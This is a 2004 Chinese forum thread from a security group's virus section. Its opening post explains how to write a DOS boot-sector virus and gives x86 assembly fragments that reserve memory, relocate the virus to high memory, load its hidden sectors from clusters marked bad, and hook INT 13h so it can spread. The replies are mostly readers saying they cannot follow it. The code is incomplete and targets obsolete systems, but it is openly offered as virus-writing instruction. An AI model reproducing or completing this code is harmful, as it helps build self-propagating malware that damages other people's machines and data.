|
 | 作者: cck123 [cck123]
 论坛用户 |
登录 |
| 导形病毒指驻留在硬盘的主引导分区或硬软盘的 DOS 引导分区的病毒。由于 pc 开机后,会先执行主引导分区的代码,因此病毒可以获得第一控制权,在引导 DOS 操作系统之前,作完以下事情: a. 减少dos可用最大内存量,以供己需;如: xor ax,ax mov ss,ax mov sp,7c00h mov ds,ax mov ax,word ptr ds:[413h] ; here store largest mem 0000:0413 sub ax,2 ; apply 2k mem for virus mov ds:[413h],ax b. 修改必要的中断向量,以便传播; c. 读入病毒的其它部分,进行病毒的拼装(在内存高端); 先从已标记的簇中某扇区读入病毒的其他部分,这些簇往往被标记为坏簇,(但是文件型病毒则不必如此,二者混合型亦然)然后再读入原引导记录到0000:7c00h,跳转执行。代码如下: mov cl,06h shl ax,cl ; ax = 8F80 add ax,0840h ; ax = 97c0 mov es,ax mov si,7c00h ; si = 7c00 mov di,si mov cx,0100h repz movsw ; 将病毒移到高端. v2: push ax pop ds push ax mov bx,7c4bh push bx ret ; 指令执行转入高端内存 call v3 v3: xor ah,ah ; ah=0 int 13h mov ah,80h and byte ptr ds:[7df8h],al v4: mov bx,word ptr ds:[7df9h] ; 读入病毒的其他部分. push cs pop ax ; ax=97c0 sub ax,20h ; ax=97a0 mov es,ax ; es=97a0 call v9 mov bx,word ptr ds:[7df9h] ; load logic sector id inc bx ; bx++ , is boot sector mov ax,0ffc0h ; ffc0:8000 = 0000:7c00 读入原引导分区内容. mov es,ax call v9 xor ax,ax ; AX=0 mov byte ptr ds:[7df7h],al ; flag = 0 v5: mov ds,ax ; ds=0 mov ax,word ptr ds:[4ch] ; mov bx,word ptr ds:[4eh] ; 修改中断向量. mov word ptr ds:[4ch],7cd6h mov word ptr ds:[4eh],cs ; now int13h had been changed push cs pop ds ; ds=cs mov word ptr ds:[7d30h],ax ; save original int13 vector mov word ptr ds:[7d32h],bx ; v6: mov dl,byte ptr ds:[7df8h] ; load drive letter v7: ;======================================================= ; jmp 0000:7c00 ; here is a jump db 0eah,00h,7ch,00h,00h 这里是个跳转指令的二进制代码. ;======================================================= d. 读入原主引导分区,转去执行dos的引导工作 |
| 地主 发表时间: 04-03-24 23:44 |
 | 回复: dsx [dsx] 论坛用户 |
登录 |
想看 但看不懂 |
| B1层 发表时间: 04-03-25 20:11 |
 | 回复: AEOLIAN [aeolian] 论坛用户 |
登录 |
看不懂咧,,想学 但是没教程。。 |
| B2层 发表时间: 04-04-02 13:36 |
 | 回复: kailangq [kailangq]  版主 |
登录 |
 多谢提供信息 |
| B3层 发表时间: 04-04-02 13:37 |
 | 回复: snowred [snowred]  论坛用户 |
登录 |
|
好! 顶!!! |
| B4层 发表时间: 04-04-02 15:21 |
 | 回复: liuyit [liuyit]  论坛用户 |
登录 |
|
有点思路启发!!3Q |
| B5层 发表时间: 04-09-24 20:11 |
 | 回复: fcuuff [fcuuff] 论坛用户 |
登录 |
|
不懂 |
| B6层 发表时间: 04-09-25 03:17 |
 | 回复: ly258 [ly258]  论坛用户 |
登录 |
|
对于没有学过的人是有点难,但是只有这样,才有学的兴趣呀。 因为,对它有一种想了解的冲动,才会花时间去好好的学。 支持。大家一起学吧。 |
| B7层 发表时间: 04-09-29 15:09 |
| 回复: xl8549716 [xl8549716] 论坛用户 |
登录 |
呵呵 郁闷死了!怎么现在老感觉看高手写文章就像是看天书,跟本看不懂。特别是那些乱七八糟的代码,更是让人迷茫!哎 !要是哪位大侠能做出一个动画教程来让我们这些菜鸟入门就好了!嘿嘿,那小弟感激不尽! |
| B8层 发表时间: 04-10-05 00:29 |
 | 回复: seny11 [seny11] 论坛用户 |
登录 |
|
汗。。 哪位解释下啊 [此贴被 seny11(seny11) 在 12月05日08时51分 编辑过] |
| B9层 发表时间: 04-12-04 22:17 |
 | 回复: boyan [boyan] 论坛用户 |
登录 |
|
哟`````````````` 有字天书啊! 太菜了呀!~!~! |
| B10层 发表时间: 04-12-15 22:10 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 病毒专区
标题: 引导型病毒编制方法(含源程序)第八军团